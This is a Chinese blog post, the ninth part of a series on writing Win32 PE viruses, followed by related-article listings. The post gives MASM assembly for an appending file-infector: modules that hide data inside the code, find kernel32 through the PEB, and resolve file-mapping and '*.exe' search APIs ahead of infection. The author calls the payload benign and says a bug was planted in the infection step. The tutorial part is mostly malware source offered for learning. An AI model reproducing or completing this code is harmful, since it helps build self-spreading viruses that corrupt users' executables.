关于PE病毒编写的学习(九)——追加病毒的编写(上)

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: win32病毒 文章标签: database dll byte api include dos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbostar/article/details/5968811
版权

  OK,兑现我的承诺,从本章开始讲述“追加病毒”的编写方法。我们将实现一个只弹出对话框的良性病毒,但是考虑到这个代码可能造成的危害,我会在感染模块中写入一个小Bug。不过,对于大家的学习是毫无影响的。

 

  回到正题,先介绍一下“追加病毒”,在DOS时代中,这种病毒相当常见。由于.com文件的入口点是固定的,而且我们知道DOS平台程序可以随意使用中断,因此追加病毒只要将病毒代码追加到宿主文件尾,然后修改入口点代码成“jmp [病毒入口点]”,病毒执行完成后,再jmp到宿主程序。

 

  到了win32平台下,这种方法是不行滴。首先由于win32下,应用程序不能使用中断,取而代之的是API,但是常用宿主文件的PE文件格式只会为宿主文件本身配置API,病毒代码是不能直接得到的。其次将病毒代码追加到文件尾,如果不修改宿主文件的PE头,病毒可能不被加载到内存中。还有DOS追加病毒就存在的数据重定位问题,那么看看下面我们如何解决这些问题呢?

 

一.先看一下主模块——Main.asm

.386
.model flat, stdcall
option casemap:none
include windows.inc ;虽然不会调用这里的函数,但是其中的常量还是用的,比如INVILID
include My_Marco.asm ;自定义的一些宏,里边内容用的时候我再说


.code
Start:
  main proc

;主模块分成五个子模块
  Include Data_and_Locate.asm
  Include ReLocate_API.asm
  Include Infect.asm
  Include Destory.asm

  Include Cleanup_and_jmp.asm


  ret

main endp

include My_GetProcAddress.asm;这个里边其中就是上一篇中的My_Get_API_Address
VirusSize=$-Start ;病毒长度

end Start

 

二.局部变量和只读数据以及只读数据重定位模块——Data_and_Locate.asm

;首先声明main proc的局部变量

LOCAL Kernel32Base:dword
LOCAL Kernel32NumberOfName:dword
LOCAL Kernel32AddressOfFunctions:dword
LOCAL Kernel32AddressOfNames:dword
LOCAL Kernel32AddressOfOrdinarls:dword
LOCAL DataBase:dword

 

LOCAL hKernel32DLL:HANDLE
LOCAL hUser32DLL:HANDLE
LOCAL hFindFirstFile:HANDLE

 

LOCAL szLocalFilePath[MAX_PATH]:byte

LOCAL stHostFile:PE_FileInformation
LOCAL stLocalFile:PE_FileInformation

LOCAL aLoadLibraryA:dword
LOCAL aGetProcAddress:dword
LOCAL aCreateFileA:dword
LOCAL aCreateFileMappingA:dword
LOCAL aMapViewOfFile:dword
LOCAL aFindFirstFileA:dword
LOCAL aFindNextFileA:dword

LOCAL aGetModuleFileNameA:dword

LOCAL aUnmapViewOfFile:dword
LOCAL aCloseHandle:dword
LOCAL aMessageBoxA:dword
LOCAL Temp:dword
LOCAL fd:WIN32_FIND_DATA
LOCAL NewSectionTable:dword
LOCAL Virus_OEP_File_Offset:dword
LOCAL Virus_OEP_Map_Offset:dword


;重定位数据,使得数据内嵌在代码节中,同时定位标记“Data:”的地址
call Relocation   
Data:

     sLoadLibraryA =$-Data ;该只读数据与Data的偏移
      byte  'LoadLibraryA',0 ;数据内容,可以看出这是一个C风格的字符串
   

    sGetProcAddress =$-Data
      byte  'GetProcAddress',0
    
     sKernel32DLL =$-Data
      byte 'Kernel32.dll',0
      
     sUser32DLL  =$-Data
      byte 'User32.dll',0
    
     sCreateFileA =$-Data
      byte 'CreateFileA',0
    
     sCreateFileMappingA=$-Data
        byte 'CreateFileMappingA',0
    
     sMapViewOfFile =$-Data
      byte 'MapViewOfFile',0
    
     sFindFirstFileA =$-Data
      byte 'FindFirstFileA',0
      
     sFindFirstFileA_Param=$-Data
        byte '*.exe',0
    
     sFindNextFileA =$-Data
      byte 'FindNextFileA',0
      
     sGetModuleFileNameA=$-Data
      byte 'GetModuleFileNameA',0
    
     sUnmapViewOfFile =$-Data
      byte 'UnmapViewOfFile',0
      
     sGetFileSize =$-Data
        byte 'GetFileSize',0
      
     sCloseHandle =$-Data
        byte 'CloseHandle',0
      
     sCaption  =$-Data
      byte 'The virus for testing',0
    
     sContext  =$-Data
      byte  'This is a additional virus',0
    
     sMessageBoxA =$-Data
        byte 'MessageBoxA',0
    
     sNewSectionName =$-Data
      byte '.Virus',0,0 
    
     aOEP_HostFile =$-Data
        dword 0h        
 
Relocation:
  pop DataBase ;不但pop的值恰好是Data:的地址,call又巧妙地跳过数据块

三.API重定位模块——ReLocate_API.asm

;取得Kernel32.dll的基址
  assume fs:nothing
  mov eax, [fs:30h]
  mov eax, [eax+0ch]
  mov eax, [eax+1ch]
  mov eax, [eax]
  mov eax, [eax+8h]
  mov  Kernel32Base,eax

;利用LoadLibrary和GetProcAddress取得所需函数的地址

 

;这里使用了My_Marco.asm的宏

;PushData macro Base,OffsetAddress
mov eax,Base
add eax,OffsetAddress
push eax
;ENDM

 

  PushData DataBase,sLoadLibraryA
  push Kernel32Base 
  call My_Get_API_Address
  mov  aLoadLibraryA,eax ;得到函数LoadLibraryA的地址

  PushData DataBase,sGetProcAddress
  push Kernel32Base 
  call My_Get_API_Address
  mov  aGetProcAddress,eax ;得到函数GetProcAddress的地址
 
;利用LoadLibrary和GetProcAddress取得所需函数的地址

;这里使用了My_Marco.asm的宏

;Using_API_LoadLibraryA macro Value,Base,OffsetAddress
PushData Base,OffsetAddress
call aLoadLibraryA
mov Value,eax
;ENDM

;Using_API_GetProcAddress macro Value,Base,OffsetAddress,hDLL
PushData Base,OffsetAddress
Push hDLL
call aGetProcAddress
mov Value,eax
;ENDM 
  Using_API_LoadLibraryA hKernel32DLL,DataBase,sKernel32DLL
  Using_API_LoadLibraryA hUser32DLL,DataBase,sUser32DLL

  Using_API_GetProcAddress aCreateFileA,DataBase,sCreateFileA,hKernel32DLL
  Using_API_GetProcAddress aCreateFileMappingA,DataBase,sCreateFileMappingA,hKernel32DLL
  Using_API_GetProcAddress aMapViewOfFile,DataBase,sMapViewOfFile,hKernel32DLL
  Using_API_GetProcAddress aFindFirstFileA,DataBase,sFindFirstFileA,hKernel32DLL
  Using_API_GetProcAddress aFindNextFileA,DataBase,sFindNextFileA,hKernel32DLL
  Using_API_GetProcAddress aGetModuleFileNameA,DataBase,sGetModuleFileNameA,hKernel32DLL
  Using_API_GetProcAddress aUnmapViewOfFile,DataBase,sUnmapViewOfFile,hKernel32DLL

  Using_API_GetProcAddress aCloseHandle,DataBase,sCloseHandle,hKernel32DLL
  Using_API_GetProcAddress aMessageBoxA,DataBase,sMessageBoxA,hUser32DL

 

 

 

yangbostar
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DOM学习——创建、添加、删除节点
01-08
在子节点后追加元素:node.appendChild(child) node-父级 child-子级 在某一指定元素前添加元素:node.insertBefore(child,指定元素) node-父级 child-子级 123 //1.创建元素节点 var li = document.c
关于PE病毒编写学习(十)——追加病毒编写(下)
蛛丝
10-30 2668
  原本这一篇应该和上一篇同时发,但是我的原来代码写得很烂,而且由于我的目标是编写一个“追加病毒”框架,代码又要具备良好的模块特征。这两天改来改去,已经头脑混乱了,所以还是先发文章把原来的代码挂上,有时间再改,我会配上说明。  另外提一句,我把一个bug写再AddSection这个函数里,很多教学码也故意写这个错误,这个错误本意是修改由于PE文件头的修改使“xx值”应适当变化,实际写入的是空位置,这个值不应该变化,这个画蛇添足的行为会导致被感染文件出现一个对齐问题的错误,使系统认为它不是一个有效文件。自己独
憨憨也能写出PE病毒
bbszhenshuai的博客
05-18 2464
导语 这是我软件安全作业,希望对想要学习PE病毒编写的同学们有所帮助。 目标 编写一个PE文件传染程序infect.exe,功能要求如下: infect.exe运行后,向同目录下的notepad.exe程序植入“病毒载荷”代码. infect.exe不能重复传染notepad.exe. notepad.exe被植入“病毒载荷”后,具备如下行为:一旦执行,就会向其所在目录写入一个txt文件,文件名为:学号-姓名.txt,文件内容为空。注意:这里的姓名和学号要改为同学自己的名字和学号。 基本思路 infe
PE文件病毒实验(二)——实验报告
热门推荐
jmhIcoding
03-01 1万+
实验目的:掌握PE文件格式;理解病毒感染PE文件的原理。 实验内容: (1) 了解PE文件格式。 (2) 根据实验步骤,编程实现在PE文件中插入病毒代码。运行插入病毒代码后的PE文件。 (3) 编程实现在磁盘中搜索.exe文件的操作,对于所有的.exe文件插入病毒代码并运行插入病毒代码后的exe文件。 (4) 编程实现在磁盘中搜索(3)中的.exe文件的操作,对于所有的.exe文件删除病毒代码并运...
写了一个添加节感染Intel X86 PE文件的程序(Virus)
_KaQqi的博客
02-08 541
为了加深一下PE文件的理解 就随手写了一个 其实ASM才是病毒的王道23333 不需要重定位 嘿嘿~ 这个程序会感染当前目录以及所有子目录中的所有的Intel x86类型的PE文件 写的不是很好 大牛勿喷. .686p .model flat,stdcall option casemap:none include InfectPe.inc .code start: assume
EXP2 分析PE感染程序
zjlong668的博客
04-16 874
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件,感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 感染前后文件不一样的地方就被winhex用黑色给标记出来了 一共有四处不一样: 感染前有3个节(00 03)感染后有4个节(00 04) 感染前时间戳为B...
2023.8.31学习日志追加
最新发布
09-15
实验任务书
java IO流学习笔记——(2)文件字符流&字节数组流
12-21
java IO流学习笔记——(2)文件字符流&字节数组流 文件字符流FileReader&FileWriter FileReader :通过字符的方式读取文件,仅适合字符文件 FileWriter :通过字节的方式写出或追加数据到文件中,仅适合字符文件 部分...
Linux基础命令学习——文件打包压缩和搜索命令(四)
01-09
今天来写一篇关于学习Linux基础命令——文件打包压缩和搜索命令的博文,也实践了很多,总结给大家一起学习! 一、tar命令 用于对文件进行打包压缩或解压;格式:tar [选项] 档案文件 文件列表 -c:生成档案文件 -v:...
TextView Html.fromHtml ScrollView——可追加自动显示最后行
09-06
富文本就是可以编辑不同颜色、大小、粗细、段落字体的TextView。本例利用Html.fromHtml 和ScrollView实现了让Textview的文本格式相对丰富,可自动滚动显示最后一行。
PE 文件型病毒编写实验(一)
jmhIcoding
11-09 1万+
这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一下PE的相关。后面 渣电是考上啦,网络安全专业也考上啦,可是大一到大三虽然偶然零零星星地看了一些PE相关的东西,却一直没有集中化的时间来研究PE,因为总是有其它项目找上自己。这个学期刚好有计算机病毒这门
学习日记——(计算机病毒PE文件病毒
weixin_54055099的博客
11-22 6056
一、相关知识 PE文件病毒的原理:PE文件病毒感染病毒时,将自身代码复制到目标文件中 PE文件病毒在目标文件前运行,那么,它是怎么做到的呢? 答:PE病毒感染其他文件的常见方法是: 在文件中添加一个新节,然后把病毒代码和执行后返回宿主程序的代码写入到新添加的节中; 同时修改PE文件头的入口地址,使它指向新添加的病毒代码入口; 这样做后,当程序运行时,首先运行病毒代码,运行完后再转去运行宿主代码。 PE文件病毒的感染过程: 第一种: 判断目标文件开始的两个字节是否为“MZ”; 判断PE文件的
WIN32 汇编写病毒感染PE文件
枪与玫瑰的专栏
05-05 4442
WIN32 汇编写病毒感染PE文件作者:PSH 日期:2007/3/26转载请注明出处,本人原创,欢迎交流。近来没事学习了下病毒技术,看到网上好多年青人对这个比较感兴趣,那就写出来大家分享下吧。1前提知识a.熟练WIN32 ASM 语言,不会ASM就难得写出感染PE病毒。比如“熊猫”,就不是ASM 写的,他感染PE就是个捆绑机。b.熟悉PE文件的格式,不了解PE怎么写病毒病毒就是修改PE文件。
基于C++的shellcode及植入目标程序设计 课程报告+代码及exe可执行文件
毕业作品网站
05-15 536
目录 一.程序模块划分 1 二.主要模块描述 1 2.1 Shellcode 的生成 1 2.2 infect.cpp 简介 5 SetBytes 用于向文件指定位置覆盖写入 5 GetBytes 用于读取文件指定位置内容 5 获得 Dos 头中的 e_lfanew,即 PE 头的 RVA 6 三.传染模块的设计与实现 6 验证 PE 文件 8 2.获取 PE 头位置 9 四.PE 文件格式简述 10 Dos 头 10 PE header 11 SECTION TABLE 节
PE文件感染程序设计(PE病毒
Zyecho的博客
01-11 2486
记录PE病毒设计的入门实验
PE文件病毒感染示例
long_xing的专栏
05-29 5227
;本程序修改自hume的代码,其版权信息如下:CopyRight              db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah                       db "        Thx for using it!",0dh,0ah                       db "Contact: Hume
PE病毒初探——向exe注入代码
weixin_34384557的博客
01-31 519
PE文件其实就是Windows可执行文件,关于它的一些简要介绍摘自百度:   PE文件被称为可移植的执行体是Portable Execute的全称,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL)。   http://baike.baidu.com/view/1087038.htm   有一种病毒是...
PE文件的感染C++源代码
杨航的专栏
12-10 2850
PE文件的感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先
PE感染&ShellCode编写技术补充
Less Is More
05-28 3186
标 题: PE感染&ShellCode编写技术补充 时 间: 2013-06-04,22:45:53    上篇文章写了Windows Shell Code编写的一些技术和经验,其中讲到ShellCode中使用的数据的问题时,提供了三种方法: 1. HardCode地址,然后把数据写入HardCode的地址中 2. 转化法(HASH),把数据转化成可用寄存器存储的整数 3. 把数据Pu
mysql字段追加 tp_TP5数据库操作——增加
05-18
要在 MySQL 数据库中的表中增加字段,可以使用 ALTER TABLE 语句来实现。在 ThinkPHP 5 中,可以使用 Query 对象进行数据库操作。 以下是在 TP5 中增加 MySQL 表字段的示例代码: ```php // 获取数据库连接对象 $db = \think\Db::connect(); // 执行 SQL 语句,增加字段 $sql = "ALTER TABLE `表名` ADD COLUMN `字段名` varchar(50) NOT NULL DEFAULT '' COMMENT '字段注释'"; $db->execute($sql); ``` 其中,`表名` 是要增加字段的表名,`字段名` 是要增加的字段名,`varchar(50)` 是字段类型和长度,`NOT NULL` 表示该字段不允许为空,`DEFAULT ''` 表示该字段的默认值为空字符串,`COMMENT` 是该字段的注释信息。 执行上述代码后,就可以在指定的表中增加一个新的字段了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值